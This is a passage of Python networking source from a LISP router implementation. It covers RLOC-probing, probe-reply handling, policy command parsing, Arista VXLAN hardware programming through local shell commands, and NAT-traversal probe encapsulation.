        len(lisp_rloc_probe_list)))
    #
    # Walk the list.
    #
    count = 0
    probe = bold("RLOC-probe", False)
    for values in lisp_rloc_probe_list.values():
        #
        # Just do one RLOC-probe for the RLOC even if it is used for
        # multiple EID-prefixes.
        #
        last_rloc = None
        for parent_rloc, eid, group in values:
            addr_str = parent_rloc.rloc.print_address_no_iid()
            #
            # Do not RLOC-probe gleaned entries if configured.
            #
            x, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
            if (do_probe == False):
                e = green(eid.print_address(), False)
                addr_str += ":{}".format(parent_rloc.translated_port)
                lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
                    red(addr_str, False), e))
                continue
            #endif
            #
            # Do not send RLOC-probes to RLOCs that are in down-state or admin-
            # down-state. The RLOC-probe reply will apply for all EID-prefixes
            # and the RLOC state will be updated for each.
            #
            if (parent_rloc.down_state()): continue
            #
            # Do not send multiple RLOC-probes to the same RLOC for
            # different EID-prefixes. Multiple RLOC entries could have
            # same RLOC address but different translated ports. These
            # need to be treated as different ETRs (they are both behind
            # the same NAT) from an RTR's perspective. On an ITR, if the
            # RLOC-names are different for the same RLOC address, we need
            # to treat these as different ETRs since an ITR does not keep
            # port state for an RLOC.
            #
            if (last_rloc):
                parent_rloc.last_rloc_probe_nonce = \
                    last_rloc.last_rloc_probe_nonce
                if (last_rloc.translated_port == parent_rloc.translated_port \
                    and last_rloc.rloc_name == parent_rloc.rloc_name):
                    e = green(lisp_print_eid_tuple(eid, group), False)
                    lprint("Suppress probe to duplicate RLOC {} for {}". \
                        format(red(addr_str, False), e))
                    continue
                #endif
            #endif
            nh = None
            rloc = None
            # Walk the chain of per-next-hop RLOC clones (rloc.next_rloc),
            # starting at the parent RLOC itself.
            while (True):
                rloc = parent_rloc if rloc == None else rloc.next_rloc
                if (rloc == None): break
                #
                # First check if next-hop/interface is up for egress multi-
                # homing.
                #
                if (rloc.rloc_next_hop != None):
                    if (rloc.rloc_next_hop not in default_next_hops):
                        if (rloc.up_state()):
                            d, n = rloc.rloc_next_hop
                            rloc.state = LISP_RLOC_UNREACH_STATE
                            rloc.last_state_change = lisp_get_timestamp()
                            lisp_update_rtr_updown(rloc.rloc, False)
                        #endif
                        unreach = bold("unreachable", False)
                        # NOTE(review): 'n' and 'd' are only bound when the
                        # up_state() branch above ran on this iteration —
                        # if the RLOC was already down this lprint can hit
                        # an unbound name; confirm and fix upstream.
                        lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
                            red(addr_str, False), unreach))
                        continue
                    #endif
                #endif
                #
                # Send RLOC-probe to unreach-state RLOCs if down for a minute.
                #
                last = rloc.last_rloc_probe
                delta = 0 if last == None else time.time() - last
                if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
                    lprint("Waiting for probe-reply from RLOC {}".format( \
                        red(addr_str, False)))
                    continue
                #endif
                #
                # Check to see if we are in nonce-echo mode and no echo has
                # been returned.
                #
                echo_nonce = lisp_get_echo_nonce(None, addr_str)
                if (echo_nonce and echo_nonce.request_nonce_timeout()):
                    rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
                    rloc.last_state_change = lisp_get_timestamp()
                    unreach = bold("unreachable", False)
                    lprint("RLOC {} went {}, nonce-echo failed".format( \
                        red(addr_str, False), unreach))
                    lisp_update_rtr_updown(rloc.rloc, False)
                    continue
                #endif
                #
                # Suppress sending RLOC probe if we just received a
                # nonce-echo in the last minute.
                #
                if (echo_nonce and echo_nonce.recently_echoed()):
                    lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
                        "received").format(red(addr_str, False)))
                    continue
                #endif
                #
                # Check if we have not received a RLOC-probe reply for one
                # timer interval. If not, put RLOC state in "unreach-state".
                #
                if (rloc.last_rloc_probe != None):
                    last = rloc.last_rloc_probe_reply
                    if (last == None): last = 0
                    delta = time.time() - last
                    if (rloc.up_state() and \
                        delta >= LISP_RLOC_PROBE_REPLY_WAIT):
                        rloc.state = LISP_RLOC_UNREACH_STATE
                        rloc.last_state_change = lisp_get_timestamp()
                        lisp_update_rtr_updown(rloc.rloc, False)
                        unreach = bold("unreachable", False)
                        lprint("RLOC {} went {}, probe it".format( \
                            red(addr_str, False), unreach))
                        lisp_mark_rlocs_for_other_eids(values)
                    #endif
                #endif
                rloc.last_rloc_probe = lisp_get_timestamp()
                reach = "" if rloc.unreach_state() == False else " unreachable"
                #
                # Send Map-Request RLOC-probe. We may have to send one for each
                # egress interface to the same RLOC address. Install host
                # route in RLOC so we can direct the RLOC-probe on an egress
                # interface.
                #
                nh_str = ""
                n = None
                if (rloc.rloc_next_hop != None):
                    d, n = rloc.rloc_next_hop
                    lisp_install_host_route(addr_str, n, True)
                    nh_str = ", send on nh {}({})".format(n, d)
                #endif
                #
                # Print integrated log message before sending RLOC-probe.
                #
                rtt = rloc.print_rloc_probe_rtt()
                astr = addr_str
                if (rloc.translated_port != 0):
                    astr += ":{}".format(rloc.translated_port)
                #endif
                astr= red(astr, False)
                if (rloc.rloc_name != None):
                    astr += " (" + blue(rloc.rloc_name, False) + ")"
                #endif
                lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
                    astr, rtt, nh_str))
                #
                # If we are doing multiple egress interfaces, check for host
                # routes. We don't want the ones we selected for forwarding to
                # affect the path RLOC-probes go out in the following loop. We
                # will restore the host route while waiting for RLOC-replies.
                # Then we'll select a new host route based on best RTT.
                #
                if (rloc.rloc_next_hop != None):
                    nh = lisp_get_host_route_next_hop(addr_str)
                    if (nh): lisp_install_host_route(addr_str, nh, False)
                #endif
                #
                # Might be first time and other RLOCs on the chain may not
                # have RLOC address. Copy now.
                #
                if (rloc.rloc.is_null()):
                    rloc.rloc.copy_address(parent_rloc.rloc)
                #endif
                #
                # Send RLOC-probe Map-Request.
                #
                seid = None if (group.is_null()) else eid
                deid = eid if (group.is_null()) else group
                lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
                last_rloc = parent_rloc
                #
                # Remove installed host route.
                #
                if (n): lisp_install_host_route(addr_str, n, False)
            #endwhile
            #
            # Reinstall host route for forwarding.
            #
            if (nh): lisp_install_host_route(addr_str, nh, True)
            #
            # Send 10 RLOC-probes and then sleep for 20 ms.
            #
            count += 1
            if ((count % 10) == 0): time.sleep(0.020)
        #endfor
    #endfor
    lprint("---------- End RLOC Probing ----------")
    return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
    """
    ITR-only: notify the lisp-etr process over IPC that RLOC-probing
    found RTR 'rtr' up (updown True) or down (updown False).
    """
    global lisp_ipc_socket

    #
    # Only the lisp-itr process sends this message.
    #
    if (lisp_i_am_itr == False): return

    #
    # When configured to register all RTRs unconditionally, status does
    # not matter, so suppress the IPC chatter.
    #
    if (lisp_register_all_rtrs): return

    #
    # Ignore RTRs this process did not learn from the map-server.
    #
    rtr_str = rtr.print_address_no_iid()
    if ((rtr_str in lisp_rtr_list) == False): return

    updown = "up" if updown else "down"
    lprint("Send ETR IPC message, RTR {} has done {}".format(
        red(rtr_str, False), bold(updown, False)))

    #
    # Build and send the IPC message.
    #
    ipc = lisp_command_ipc("rtr%{}%{}".format(rtr_str, updown), "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
    return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc, source, port, nonce, hop_count, ttl):
    """
    Process a received RLOC-probe Map-Reply. Locate the probe state for
    the replying RLOC and update every (rloc, eid, group) tuple that uses
    it. The ETR may source the reply from a different address than the
    Map-Reply RLOC record, so four keys are tried in order: RLOC,
    RLOC:port, source, source:port.
    """
    probe = bold("RLOC-probe reply", False)
    map_reply_addr = rloc.print_address_no_iid()
    source_addr = source.print_address_no_iid()
    pl = lisp_rloc_probe_list

    addr = None
    for candidate in [map_reply_addr, map_reply_addr + ":" + str(port),
        source_addr, source_addr + ":" + str(port)]:
        if (candidate in pl):
            addr = candidate
            break
        #endif
    #endfor

    if (addr == None):
        lprint("  Received unsolicited {} from {}/{}, port {}". \
            format(probe, red(map_reply_addr, False), red(source_addr,
            False), port))
        return
    #endif

    #
    # Update stored RLOC-probe state for every EID tuple using this RLOC.
    # On an RTR, a translated port must also match since RLOCs behind the
    # same NAT are distinguished by port.
    #
    for rloc, eid, group in lisp_rloc_probe_list[addr]:
        if (lisp_i_am_rtr and rloc.translated_port != 0 and
            rloc.translated_port != port): continue
        rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
    #endfor
    return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
    #
    # Count registerable entries across all database-mappings: a
    # dynamic-EID database-mapping contributes one entry per discovered
    # dynamic-EID, a static one contributes one; each name in the EID's
    # iid-list contributes an additional entry.
    #
    count = 0
    for db in lisp_db_list:
        count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
        count += len(db.eid.iid_list)
    #endfor
    return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
    #
    # Longest-match test: the supplied EID is ours when it falls inside any
    # configured database-mapping EID-prefix.
    #
    match_found = False
    for db in lisp_db_list:
        if (eid.is_more_specific(db.eid)):
            match_found = True
            break
        #endif
    #endfor
    return(match_found)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
    #
    # Insert dashes every 4 hex digits in both MAC strings and join them
    # with an arrow for lisp.dprint() display.
    #
    dashed = []
    for mac in [sa, da]:
        dashed.append("-".join([mac[0:4], mac[4:8], mac[8:12]]))
    #endfor
    return("{} -> {}".format(dashed[0], dashed[1]))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
    #
    # Return the lisp_nonce_echo() state for an RLOC, or None when
    # nonce-echoing is disabled or no state exists. When a lisp_address is
    # supplied it overrides the string form.
    #
    if (lisp_nonce_echoing == False): return(None)

    if (rloc): rloc_str = rloc.print_address_no_iid()
    return(lisp_nonce_echo_list.get(rloc_str, None))
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
    #
    # Extract a null-terminated distinguished-name (AFI=17) from the front
    # of the packet buffer. Names of 255 or more characters before the
    # terminator (or an unterminated buffer) are invalid and return
    # [None, None]. Otherwise return the remaining packet past the null
    # and the name.
    #
    index = packet.find("\0")
    if (index == -1 or index >= 255): return([None, None])

    dist_name = packet[0:index]
    packet = packet[index+1::]
    return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of entries whose first three
# elements are passed to lisp_packet.print_flow() and whose fourth element
# is the lisp_packet itself. This function is called and run in its own
# thread and then exits.
#
def lisp_write_flow_log(flow_log):
    #
    # Append each flow entry to the flow log file. The lisp_packet instance
    # is the 4th element of each entry; the first three elements are passed
    # through to lisp_packet.print_flow().
    #
    log_file = open("./logs/lisp-flow.log", "a")
    entry_count = 0
    for flow in flow_log:
        lisp_pkt = flow[3]
        log_file.write(lisp_pkt.print_flow(flow[0], flow[1], flow[2]))
        entry_count += 1
    #endfor
    log_file.close()
    del(flow_log)

    lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(
        bold(str(entry_count), False)))
    return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
    #
    # Process one "lisp policy" command. kv_pair maps each match keyword to
    # an array of per-match-clause values (one element per configured match
    # sub-clause, empty string when absent); the set-* and policy-name
    # keywords map to a single scalar value. A lisp_policy() is built with
    # one lisp_policy_match() per match clause and then saved.
    #
    p = lisp_policy("")
    set_iid = None

    # "datetime-range" is always present in kv_pair, so its array length
    # tells how many match sub-clauses were configured.
    match_set = []
    for i in range(len(kv_pair["datetime-range"])):
        match_set.append(lisp_policy_match())
    #endfor

    for kw in kv_pair.keys():
        value = kv_pair[kw]

        #
        # Check for match parameters.
        #
        if (kw == "instance-id"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                if (match.source_eid == None):
                    match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                #endif
                if (match.dest_eid == None):
                    match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                #endif
                match.source_eid.instance_id = int(v)
                match.dest_eid.instance_id = int(v)
            #endfor
        #endif
        if (kw == "source-eid"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                if (match.source_eid == None):
                    match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                #endif
                # Preserve any instance-id already stored on this clause;
                # store_prefix() would otherwise clobber it.
                iid = match.source_eid.instance_id
                match.source_eid.store_prefix(v)
                match.source_eid.instance_id = iid
            #endfor
        #endif
        if (kw == "destination-eid"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                if (match.dest_eid == None):
                    match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                #endif
                iid = match.dest_eid.instance_id
                match.dest_eid.store_prefix(v)
                match.dest_eid.instance_id = iid
            #endfor
        #endif
        if (kw == "source-rloc"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
                match.source_rloc.store_prefix(v)
            #endfor
        #endif
        if (kw == "destination-rloc"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
                match.dest_rloc.store_prefix(v)
            #endfor
        #endif
        if (kw == "rloc-record-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                match.rloc_record_name = v
            #endfor
        #endif
        if (kw == "geo-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                match.geo_name = v
            #endfor
        #endif
        if (kw == "elp-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                match.elp_name = v
            #endfor
        #endif
        if (kw == "rle-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                match.rle_name = v
            #endfor
        #endif
        if (kw == "json-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match = match_set[i]
                match.json_name = v
            #endfor
        #endif
        if (kw == "datetime-range"):
            for i in range(len(match_set)):
                v = value[i]
                match = match_set[i]
                if (v == ""): continue
                # The value is two concatenated 19-character datetime
                # strings: lower bound followed by upper bound. Only store
                # them when both parse as valid datetimes.
                l = lisp_datetime(v[0:19])
                u = lisp_datetime(v[19::])
                if (l.valid_datetime() and u.valid_datetime()):
                    match.datetime_lower = l
                    match.datetime_upper = u
                #endif
            #endfor
        #endif

        #
        # Check for set parameters.
        #
        if (kw == "set-action"):
            p.set_action = value
        #endif
        if (kw == "set-record-ttl"):
            p.set_record_ttl = int(value)
        #endif
        if (kw == "set-instance-id"):
            if (p.set_source_eid == None):
                p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            #endif
            if (p.set_dest_eid == None):
                p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            #endif
            # Remember the set instance-id so later set-source-eid /
            # set-destination-eid keywords can re-apply it after
            # store_prefix().
            set_iid = int(value)
            p.set_source_eid.instance_id = set_iid
            p.set_dest_eid.instance_id = set_iid
        #endif
        if (kw == "set-source-eid"):
            if (p.set_source_eid == None):
                p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            #endif
            p.set_source_eid.store_prefix(value)
            if (set_iid != None): p.set_source_eid.instance_id = set_iid
        #endif
        if (kw == "set-destination-eid"):
            if (p.set_dest_eid == None):
                p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            #endif
            p.set_dest_eid.store_prefix(value)
            if (set_iid != None): p.set_dest_eid.instance_id = set_iid
        #endif
        if (kw == "set-rloc-address"):
            p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
            p.set_rloc_address.store_address(value)
        #endif
        if (kw == "set-rloc-record-name"):
            p.set_rloc_record_name = value
        #endif
        if (kw == "set-elp-name"):
            p.set_elp_name = value
        #endif
        if (kw == "set-geo-name"):
            p.set_geo_name = value
        #endif
        if (kw == "set-rle-name"):
            p.set_rle_name = value
        #endif
        if (kw == "set-json-name"):
            p.set_json_name = value
        #endif
        if (kw == "policy-name"):
            p.policy_name = value
        #endif
    #endfor

    #
    # Store match clauses and policy.
    #
    p.match_clauses = match_set
    p.save_policy()
    return
#enddef
#
# Command registration for "lisp policy": maps the command name to its
# handler function and the keywords the command parser accepts.
#
# NOTE(review): the per-keyword arrays appear to encode value constraints
# consumed by the command parser ([text-valued?] or [text-valued?, min,
# max]) -- confirm against the lispers.net command-processing code.
#
lisp_policy_commands = {
    "lisp policy" : [lisp_policy_command, {
        "policy-name" : [True],
        "match" : [],
        "instance-id" : [True, 0, 0xffffffff],
        "source-eid" : [True],
        "destination-eid" : [True],
        "source-rloc" : [True],
        "destination-rloc" : [True],
        "rloc-record-name" : [True],
        "elp-name" : [True],
        "geo-name" : [True],
        "rle-name" : [True],
        "json-name" : [True],
        "datetime-range" : [True],
        "set-action" : [False, "process", "drop"],
        "set-record-ttl" : [True, 0, 0x7fffffff],
        "set-instance-id" : [True, 0, 0xffffffff],
        "set-source-eid" : [True],
        "set-destination-eid" : [True],
        "set-rloc-address" : [True],
        "set-rloc-record-name" : [True],
        "set-elp-name" : [True],
        "set-geo-name" : [True],
        "set-rle-name" : [True],
        "set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
    #
    # Send the supplied CLI command to the Arista FastCli, optionally in
    # the context of a specific interface.
    #
    interface = "" if (interface == None) else "interface " + interface

    cmd_str = command if (interface == "") else interface + ": " + command
    lprint("Send CLI command '{}' to hardware".format(cmd_str))

    cli_script = '''
        enable
        configure
        {}
        {}
    '''.format(interface, command)
    os.system("FastCli -c '{}'".format(cli_script))
    return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
    #
    # Ask the Arista hardware whether the EID-prefix route's hit bit is
    # set. The command output's second line (first after the header) holds
    # the route; its last column is "Y" or "N".
    #
    cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
    output = commands.getoutput("FastCli -c '{}'".format(cmd))

    route_line = output.split("\n")[1]
    hit_bit = route_line.split(" ")[-1].replace("\r", "")
    return(hit_bit == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
    #
    # Program an Arista VXLAN-capable system for map-cache entry "mc":
    # install a kernel route for the EID-prefix via a synthesized next-hop
    # on vlan4094, a static ARP entry binding that next-hop to a MAC
    # derived from the VTEP address, and an Arista static MAC entry that
    # bridges the MAC to the VTEP.
    #
    # For now, only do this on an Arista system. There isn't a python
    # specific signature so just look to see if /persist/local/lispers.net
    # exists.
    #
    if (os.path.exists("/persist/local/lispers.net") == False): return

    #
    # If no RLOCs, just return. Otherwise program the first RLOC.
    #
    if (len(mc.best_rloc_set) == 0): return

    #
    # Get EID-prefix and RLOC (VTEP address) in string form.
    #
    eid_prefix = mc.eid.print_prefix_no_iid()
    rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()

    #
    # Check to see if route is already present. If so, just return.
    #
    route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
        eid_prefix))
    if (route != ""):
        lprint("Route {} already in hardware: '{}'".format( \
            green(eid_prefix, False), route))
        return
    #endif

    #
    # Look for a vxlan interface and a vlan4094 interface. If they do not
    # exist, issue message and return. If we don't have an IP address on
    # vlan4094, then exit as well.
    #
    ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
    if (ifconfig.find("vxlan") == -1):
        lprint("No VXLAN interface found, cannot program hardware")
        return
    #endif
    if (ifconfig.find("vlan4094") == -1):
        lprint("No vlan4094 interface found, cannot program hardware")
        return
    #endif

    ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
    if (ipaddr == ""):
        lprint("No IP address found on vlan4094, cannot program hardware")
        return
    #endif
    ipaddr = ipaddr.split("inet ")[1]
    ipaddr = ipaddr.split("/")[0]

    #
    # Get a unique next-hop IP address on vlan4094's subnet. To be used as
    # a handle to get VTEP's mac address. And then that VTEP's MAC address
    # is a handle to tell VXLAN to encapsulate IP packet (with frame header)
    # to the VTEP address.
    #
    # Fix: skip only "(incomplete)" (unresolved) entries so that resolved,
    # in-use addresses land in arp_entries and are never re-allocated. The
    # previous test was inverted and collected only incomplete entries,
    # allowing an address already in use to be picked as the next-hop.
    #
    arp_entries = []
    arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
    for line in arp_lines:
        if (line.find("vlan4094") == -1): continue
        if (line.find("(incomplete)") != -1): continue
        nh = line.split(" ")[0]
        arp_entries.append(nh)
    #endfor

    #
    # Scan host numbers 1-254 for an address not in the ARP table and not
    # our own vlan4094 address.
    #
    nh = None
    local = ipaddr
    ipaddr = ipaddr.split(".")
    for i in range(1, 255):
        ipaddr[3] = str(i)
        addr = ".".join(ipaddr)
        if (addr in arp_entries): continue
        if (addr == local): continue
        nh = addr
        break
    #endfor
    if (nh == None):
        lprint("Address allocation failed for vlan4094, cannot program " + \
            "hardware")
        return
    #endif

    #
    # Derive MAC address from VTEP address an associate it with the next-hop
    # address on vlan4094. This MAC address must be the MAC address on the
    # foreign VTEP configure with "ip virtual-router mac-address <mac>".
    #
    # Fix: the dotted-quad octets are strings; lisp_hex_string() needs an
    # integer, so convert with int() before formatting.
    #
    rloc_octets = rloc.split(".")
    octet1 = lisp_hex_string(int(rloc_octets[1])).zfill(2)
    octet2 = lisp_hex_string(int(rloc_octets[2])).zfill(2)
    octet3 = lisp_hex_string(int(rloc_octets[3])).zfill(2)
    mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
    arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
    arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
    os.system(arp_command)

    #
    # Add VXLAN entry for MAC address.
    #
    vxlan_command = ("mac address-table static {} vlan 4094 " + \
        "interface vxlan 1 vtep {}").format(arista_mac, rloc)
    lisp_send_to_arista(vxlan_command, None)

    #
    # Add route now connecting: eid-prefix -> next-hop -> mac-address ->
    # VTEP address.
    #
    route_command = "ip route add {} via {}".format(eid_prefix, nh)
    os.system(route_command)

    lprint("Hardware programmed with commands:")
    route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
    lprint("  " + route_command)
    lprint("  " + arp_command)
    vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
    lprint("  " + vxlan_command)
    return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
    #
    # Map-cache walker callback: remove the kernel route installed for this
    # entry's EID-prefix. Always continues the walk.
    #
    eid_prefix = mc.eid.print_prefix_no_iid()
    os.system("ip route delete {}".format(eid_prefix))
    return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
    global lisp_map_cache, lisp_rloc_probe_list
    global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
    global lisp_rtr_list, lisp_gleaned_groups

    banner = bold("User cleared", False)
    lprint("{} map-cache with {} entries".format(banner,
        lisp_map_cache.cache_count))

    #
    # When hardware is programmed, remove each EID route from the kernel
    # before dropping the cache.
    #
    if (lisp_program_hardware):
        lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
    #endif
    lisp_map_cache = lisp_cache()

    #
    # Need to clear the RLOC-probe list or else we'll have RLOC-probes
    # create incomplete RLOC-records.
    #
    lisp_rloc_probe_list = {}

    #
    # Also clear the encap and decap lisp-crypto arrays.
    #
    lisp_crypto_keys_by_rloc_encap = {}
    lisp_crypto_keys_by_rloc_decap = {}

    #
    # If we are an ITR, clear the RTR-list so a new set of default routes
    # can be added when the next Info-Reply comes in.
    #
    lisp_rtr_list = {}

    #
    # Clear gleaned groups data structure.
    #
    lisp_gleaned_groups = {}

    #
    # Tell external data-plane.
    #
    lisp_process_data_plane_restart(True)
    return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data-encapsulate it with a source-port of 4341
# and a destination address and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
    #
    # Data-encapsulate an RLOC-probe so it traverses a NAT: inner IP/UDP
    # headers are built here, then lisp_packet.encode() adds the outer
    # data-encapsulation header. "packet" is the raw Map-Request payload.
    # Requires the full 4-socket array (the raw socket is element 3).
    #
    if (len(lisp_sockets) != 4): return

    local_addr = lisp_myrlocs[0]

    #
    # Build Map-Request IP header. Source and destination addresses same as
    # the data encapsulation outer header. Length adds 28 bytes: a 20-byte
    # IPv4 header plus an 8-byte UDP header. 0x45 = IPv4/IHL 5, TTL 64,
    # protocol 17 (UDP).
    #
    length = len(packet) + 28
    ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
        17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
    ip = lisp_ip_checksum(ip)

    # UDP: source port 0, destination the LISP control port; checksum 0.
    udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
        socket.htons(length - 20), 0)

    #
    # Start data encapsulation logic.
    #
    packet = lisp_packet(ip + udp + packet)

    #
    # Setup fields we need for lisp_packet.encode(). The instance-id
    # 0xffffff marks this as a control message inside the data
    # encapsulation.
    #
    packet.inner_dest.copy_address(rloc)
    packet.inner_dest.instance_id = 0xffffff
    packet.inner_source.copy_address(local_addr)
    packet.inner_ttl = 64
    packet.outer_dest.copy_address(rloc)
    packet.outer_source.copy_address(local_addr)
    packet.outer_version = packet.outer_dest.afi_to_version()
    packet.outer_ttl = 64

    # With NAT state, send to the NAT-translated port; otherwise the
    # standard LISP data port.
    packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT

    rloc_str = red(rloc.print_address_no_iid(), False)
    if (nat_info):
        hostname = " {}".format(blue(nat_info.hostname, False))
        probe = bold("RLOC-probe request", False)
    else:
        hostname = ""
        probe = bold("RLOC-probe reply", False)
    #endif
    lprint(("Data encapsulate {} to {}{} port {} for " + \
        "NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))

    #
    # Build data encapsulation header.
    #
    if (packet.encode(None) == None): return

    packet.print_packet("Send", True)

    raw_socket = lisp_sockets[3]
    packet.send_packet(raw_socket, packet.outer_dest)
    del(packet)
    return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
    #
    # MacOS prints default route info as "key: value" lines from
    # "route -n get default".
    #
    if (lisp_is_macos()):
        lines = commands.getoutput("route -n get default").split("\n")
        gw = interface = None
        for line in lines:
            if (line.find("gateway: ") != -1): gw = line.split(": ")[1]
            if (line.find("interface: ") != -1):
                interface = line.split(": ")[1]
            #endif
        #endfor
        return([[interface, gw]])
    #endif

    #
    # Linux "ip route" lines look like "default via <nh> dev <device> ...".
    # Routes carrying a metric are skipped.
    #
    default_routes = commands.getoutput("ip route | egrep 'default via'")
    next_hops = []
    for route in default_routes.split("\n"):
        if (route.find(" metric ") != -1): continue

        r = route.split(" ")
        try:
            via_index = r.index("via") + 1
            if (via_index >= len(r)): continue
            dev_index = r.index("dev") + 1
            if (dev_index >= len(r)): continue
        except:
            continue
        #endtry
        next_hops.append([r[dev_index], r[via_index]])
    #endfor
    return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
    #
